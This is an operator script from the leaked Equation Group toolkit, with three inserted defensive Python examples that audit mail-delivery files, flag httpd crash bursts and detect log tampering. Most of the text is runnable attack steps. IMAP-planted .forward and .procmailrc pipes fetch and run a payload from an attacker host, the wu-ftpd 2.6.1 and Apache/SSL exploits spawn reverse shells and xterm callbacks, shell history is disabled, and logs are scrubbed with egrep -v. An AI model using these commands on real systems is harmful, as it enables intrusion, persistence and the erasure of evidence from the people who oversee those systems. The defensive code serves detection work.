### Imap masquerade
### Bring a local to get root

### for solaris

nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1
noclient -l 25
telnet TARGET_IP 143

A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {145}
"| /bin/ksh -c '/bin/cat /tmp/sendmail;chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'"
A009 DELETE .forward
A010 LOGOUT
telnet PITCH_IP 25
HELO helo
MAIL FROM: user@itt.beta.net
RCPT TO: user@itt.beta.net
DATA
.
QUIT
# echo -e "HTTP/1.0 200\n" > new
# cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail
# nc -v -l -p 53 < sendmail
# noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A100 LIST /etc/smrsh *
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {11}
"| slocal"
A100 CREATE .maildelivery
A101 APPEND .maildelivery (\Seen) {37}
To user pipe A >/home/user/.g
A102 LIST "" %
A102 RENAME .g .procmailrc
A008 APPEND .procmailrc (\Seen) {128}
:0 c
|cd /tmp;wget http://PITCH_IP:53/sendmail; chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f sendmail
A009 DELETE .forward
A009 DELETE .maildelivery
A009 DELETE .procmailrc
A010 LOGOUT
telnet localhost 25
HELO helo
MAIL FROM: user@localhost.localdomain
RCPT TO: user@localhost.localdomain
DATA
.
QUIT
telnet fawn 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A102 LIST "/usr/bin/X11" %
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {50}
"| /usr/bin/*11/xterm -display PITCH_IP:26000"
A009 DELETE .forward
A010 LOGOUT
telnet fawn 25
HELO helo
MAIL FROM: user@fawn.beta.net
RCPT TO: user@fawn.beta.net
DATA
.
QUIT
### cleanup
possible logging in /var/adm/messages (should blend in if it fails)
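The steps above all rest on the same hook: a per-user delivery file (.forward for sendmail, .procmailrc for procmail, .maildelivery for MH slocal) that pipes incoming mail into a program. The following is an added example, not part of the original script, showing what a defender can audit for: it pulls every piped command out of those three file types and checks the program against the smrsh allowlist directory (/etc/smrsh, the convention for sendmail's restricted shell). The sample file contents at the bottom are constructed.

```python
"""Audit per-user mail delivery files for pipe-to-program entries."""
import os
import re
import shlex
from typing import Dict, List, Optional, Set

DELIVERY_FILES = (".forward", ".procmailrc", ".maildelivery")

# How each file spells "pipe the message into a program"; group 1 is the command.
PIPE_RE = {
    ".forward": re.compile(r'^\s*"?\s*\|\s*(.*?)"?\s*$'),
    ".procmailrc": re.compile(r'^\s*\|\s*(.*)$'),
    # .maildelivery: field pattern action result string
    ".maildelivery": re.compile(r'^\s*\S+\s+\S+\s+pipe\s+\S+\s+(.*)$', re.I),
}
SHELLS = {"sh", "ksh", "bash", "csh", "tcsh", "zsh"}

def pipe_command(name: str, line: str) -> Optional[str]:
    """The command a line pipes mail into, or None for non-pipe / comment lines."""
    if line.lstrip().startswith("#"):
        return None
    m = PIPE_RE[name].match(line)
    return m.group(1).strip() if m else None

def program_of(command: str) -> str:
    """Basename of the first word, i.e. what smrsh/procmail will execute."""
    try:
        words = shlex.split(command)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        words = command.split()
    return os.path.basename(words[0]) if words else ""

def audit_text(name: str, text: str, smrsh_allowed: Set[str]) -> List[Dict]:
    """One finding per piped command, flagging shells, command chains and
    programs that are not linked into the smrsh directory."""
    findings = []
    for line in text.splitlines():
        cmd = pipe_command(name, line)
        if cmd is None:
            continue
        prog = program_of(cmd)
        findings.append({
            "file": name,
            "command": cmd,
            "program": prog,
            "in_smrsh": prog in smrsh_allowed,
            "shell_or_chain": prog in SHELLS or ";" in cmd,
        })
    return findings

def smrsh_allowlist(smrsh_dir: str = "/etc/smrsh") -> Set[str]:
    """Programs linked into the smrsh directory; empty if it does not exist."""
    try:
        return set(os.listdir(smrsh_dir))
    except OSError:
        return set()

def audit_home(home: str, smrsh_allowed: Set[str]) -> List[Dict]:
    """Scan one home directory's delivery files."""
    out = []
    for name in DELIVERY_FILES:
        path = os.path.join(home, name)
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                out.extend(audit_text(name, fh.read(), smrsh_allowed))
    return out

# Constructed samples: a benign vacation forward plus a procmail chain and an
# slocal pipe of the shape shown above.
SAMPLES = {
    ".forward": '"|/usr/bin/vacation alice"\n',
    ".procmailrc": ":0 c\n|cd /tmp; sh ./stage\n",
    ".maildelivery": "To user pipe A >/home/user/.g\n",
}
SAMPLE_SMRSH = {"vacation", "procmail"}   # constructed allowlist

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        for finding in audit_text(name, text, SAMPLE_SMRSH):
            print(finding)
```

On a real host, call audit_home() for each entry in /etc/passwd with smrsh_allowlist() as the second argument; anything with shell_or_chain set, or a program that is not in /etc/smrsh, deserves a look, and a .forward that appears and disappears between runs is worth correlating with the IMAP and mail logs the script above says it expects to be written.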
###########################################################
# EXPOUNDATOM
###########################################################
# Requires the target to have the wu-2.6.1 FTP service running
# Requires anonymous ftp access (determined if exploit works)
# -scan ftp TARGET_IP
# A maximum of two tries can be attempted.
#
# Syntax
# ./wu-261-linux -h
# For target list:
# ./wu-261-linux -t0 -h
# No redirection:
./wu-261-linux TARGET_IP 21 VERSION
# w/ redirection:
-tunnel
l 21 TARGET_IP
# Locally:
./wu-261-linux -a -d 127.0.0.1
./wu-261-linux -t17 -d 127.0.0.1
# Should give you root; need to upload nopen
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -latr
uncompress sendmail.Z
ls -la
chmod 700 sendmail
PATH=. sendmail
# If it complains about the user/pass being correct, then it's not vulnerable to
# the pair that we try to send it;
# Cleanup:
# /var/log/messages (look for ftp access)
# /var/adm/utmpx, wtmpx
# /var/log/secure
###################################################
### EMBERSNOUT
###################################################
# must verify that box is RH9.0(SHRIKE) and that
# httpd is "Apache/2.0.40 (Red Hat Linux)
-scan telnet TARGET_IP
-scan ssh TARGET_IP
-scan ssl TARGET_IP
# Notes:
# this indicates it's RH9.0 but could be either Psyche or Shrike:
# (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003)
# seeing this indicates (Shrike) because the version is bundled with it:
# SH-1.99-OpenSSH_3.5p1
# this version of Apache is needed but Psyche comes with 2.0.40-8 and
# Shrike comes with 2.0.40-21; the release is not determinable from
# a scan; just verify it's what is expected:
# Server: Apache/2.0.40 (Red Hat Linux)
#
# op box should work - depends if python is included
rpm -qf /usr/bin/python
# should see: python-base-2.2-9mdk
# if you want it to pop an xterm back to your screen:
# - make sure 6000 is listening
# - run xhost +
./es.py
Arguments: ['./es.py']
Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd"
where...
ip............target IP address
port..........target httpd TCP port number (usually 443)
packet_size...attack packet length in bytes
start_ebp.....guessed %ebp value to start with
end_ebp.......guessed %ebp value to end with
ebp_inc.......how many stack bytes to bump %ebp each time
hex_pad_byte..packet filling byte (0x0 will do randomized fill)
"cmd".........ASCII command string to be executed on target
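The start_ebp/end_ebp/ebp_inc arguments above mean the tool walks a range of guessed stack addresses, and each wrong guess crashes the httpd child that handled the request. On Apache 2.0 that shows up in error_log as a "child pid N exit signal Segmentation fault (11)" notice, which is exactly the line the cleanup section at the end of this script removes. The following is an added example, not part of the original script, that turns a run of those notices into an alert; the log lines are constructed samples.

```python
"""Flag bursts of httpd child crashes in an Apache 2.0 error_log."""
import re
from datetime import datetime, timedelta
from typing import List, Tuple

CRASH_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[notice\] child pid (?P<pid>\d+) exit signal "
    r"(?P<sig>Segmentation fault|Bus error|Illegal instruction) \((?P<num>\d+)\)"
)
APACHE_TS = "%a %b %d %H:%M:%S %Y"   # e.g. "Thu Aug 28 13:56:20 2003"

def parse_crashes(lines: List[str]) -> List[Tuple[datetime, int]]:
    """(timestamp, pid) for every child-crash notice; other lines are ignored."""
    crashes = []
    for line in lines:
        m = CRASH_RE.match(line)
        if m:
            crashes.append((datetime.strptime(m.group("ts"), APACHE_TS),
                            int(m.group("pid"))))
    return crashes

def crash_bursts(crashes, window=timedelta(seconds=60), threshold=5):
    """Maximal runs in which at least `threshold` crashes fall inside one
    sliding `window`. Returns (first_crash, last_crash, peak_count) per burst."""
    times = sorted(t for t, _ in crashes)
    bursts, current, i = [], None, 0
    for j, t in enumerate(times):
        while t - times[i] > window:       # slide the window's left edge
            i += 1
        count = j - i + 1
        if count >= threshold:
            if current is None:
                current = [times[i], t, count]
            else:
                current[1], current[2] = t, max(current[2], count)
        elif current is not None:          # window thinned out: close the burst
            bursts.append(tuple(current))
            current = None
    if current is not None:
        bursts.append(tuple(current))
    return bursts

# Constructed sample: one stray crash, one unrelated error, then eight
# crashes in eight seconds (what a guessed-address walk looks like).
SAMPLE_ERROR_LOG = [
    "[Thu Aug 28 13:40:00 2003] [notice] child pid 1180 exit signal Segmentation fault (11)",
    "[Thu Aug 28 13:50:12 2003] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico",
] + [
    f"[Thu Aug 28 13:56:{20 + k:02d} 2003] [notice] child pid {1201 + k} exit signal Segmentation fault (11)"
    for k in range(8)
]

if __name__ == "__main__":
    for first, last, peak in crash_bursts(parse_crashes(SAMPLE_ERROR_LOG)):
        print(f"ALERT: {peak} httpd child crashes between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

A single segfault is noise; a run of them at one-per-request pace is not. Because the script being reviewed explicitly strips "Segmentation" lines from error_log afterwards, the detector is only trustworthy when it reads a copy of the log that is shipped off the host as it is written.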
### Locally
netstat -an |grep 6000
xhost +
########### REDIRECTED:
### Redirector:
-tunnel
l 443 TARGET_IP
r 6006 127.0.0.1 6000
r NETCAT_PORT
### In a local scripted window, set up a netcat to listen for a connection:
nc -vv -l -p NETCAT_PORT
### Locally (choose a method):
### This one will send command results back to a netcat window (not interactive)
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/bin/telnet PITCH_IP NETCAT_PORT"
### This one gives you an interactive window:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh &0 2>&0)"
# or for ksh:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(ksh -c "sh &0 2>&0")"
### This one pops back an xterm (be patient for it to pop back and keep mouse clear of window):
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "/usr/bin/X11/xterm -display PITCH_IP:6 -e /bin/sh"
############ No Redirection:
./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/bin/telnet LOCALIP NETCAT_PORT"
./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -display LOCALIP:0 -e /bin/sh)"
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh &0 2>&0)"
### if the exploit stalls after a bit, hit Ctrl-C to wake it up, which
### prompts you if you want to continue - hit 'y'
### watch for a connection back to your netcat window
### Once you have access........
### you need to first clean extraneous processes started by httpd
### run this to help clean:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
pwd
exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&-
/usr/sbin/lsof |grep ^sh
uname -a; id
mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp
cd /tmp/.httpd-lock; pwd
which uudecode uncompress
#telnet PITCH_IP NETCAT_PORT
#uncompress crond.Z; chmod 700 crond; ls -la
# if no uudecode, use this
### locally:
# nc -l -vv -p NETCAT_PORT < crond
### back on target window:
#/bin/cat
/tmp/.httpd-lock/crond
chmod 700 crond
PATH=. crond
PATH=. D=-cPITCHIP:NOPEN_PORT crond
rm crond
-nstun TARGET_IP
-nrtun NOPEN_PORT
noclient TARGET_IP
### need to elevate so you can clean logs (use eventstart - ptrace won't work on RH9)
### Logging:
-lt /var/log/httpd
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
/var/log/httpd/ssl_error_log
/var/log/httpd/error_log
-lt /var/log
/var/log/messages
/var/log/secure
/var/log/maillog
egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_access_log
egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl_request_log
egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_error_log
egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages
egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure
egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog
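The egrep -v ... > t; cat t > file pattern above rewrites each log in place: the inode is preserved, the file simply gets shorter, and there is no gap in the timestamps to notice. The only reliable witness is a copy the host did not control at the time, such as a central syslog or log-shipping destination. The following is an added example, not part of the original script, that compares the forwarded copy with what is now on disk, lists the lines that vanished, and reports the one address they all share (the filter key). Both logs are constructed samples in ssl_access_log form.

```python
"""Detect selective line removal from a log by diffing against a forwarded copy."""
from collections import Counter
import re
from typing import Dict, List, Optional

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def removed_lines(forwarded: List[str], on_host: List[str]) -> List[str]:
    """Lines in the forwarded copy that no longer appear on the host.
    Multiset difference, so duplicate lines are counted, original order kept."""
    remaining = Counter(on_host)
    missing = []
    for line in forwarded:
        if remaining[line] > 0:
            remaining[line] -= 1
        else:
            missing.append(line)
    return missing

def shared_address(lines: List[str]) -> Optional[str]:
    """The single IPv4 address present in every line, if there is exactly one.
    When the answer is not None, the lines look like the output of a filter
    on that address rather than random loss."""
    if not lines:
        return None
    common = None
    for line in lines:
        addrs = set(IPV4_RE.findall(line))
        common = addrs if common is None else common & addrs
        if not common:
            return None
    return common.pop() if len(common) == 1 else None

def tamper_report(forwarded: List[str], on_host: List[str]) -> Dict:
    """Summary a monitoring job can alert on."""
    missing = removed_lines(forwarded, on_host)
    return {
        "removed": len(missing),
        "filter_key": shared_address(missing),
        # Lines only on the host are normal when forwarding lags; report, do not alert.
        "added_locally": len(removed_lines(on_host, forwarded)),
    }

# Constructed sample: what the central collector received ...
FORWARDED = [
    '198.51.100.7 - - [28/Aug/2003:13:55:01 -0400] "GET / HTTP/1.1" 200 1456',
    '192.0.2.10 - - [28/Aug/2003:13:56:20 -0400] "GET / HTTP/1.0" 400 0',
    '192.0.2.10 - - [28/Aug/2003:13:56:21 -0400] "GET / HTTP/1.0" 400 0',
    '198.51.100.7 - - [28/Aug/2003:13:57:40 -0400] "GET /index.html HTTP/1.1" 200 1456',
    '192.0.2.10 - - [28/Aug/2003:13:56:27 -0400] "GET / HTTP/1.0" 400 0',
]
# ... and what is left on the host after a filter-and-rewrite on one address.
ON_HOST = [line for line in FORWARDED if "192.0.2.10" not in line]

if __name__ == "__main__":
    print(tamper_report(FORWARDED, ON_HOST))
```

Run it per log file against the collector's copy for the same time range; a non-zero "removed" with a single filter_key is the signature of an egrep -v style cleanup rather than rotation or disk loss. Comparing the on-disk size against the last known size (the in-place rewrite keeps the inode but shrinks the file) is a cheaper first-pass check that needs no remote copy.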
https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript.txt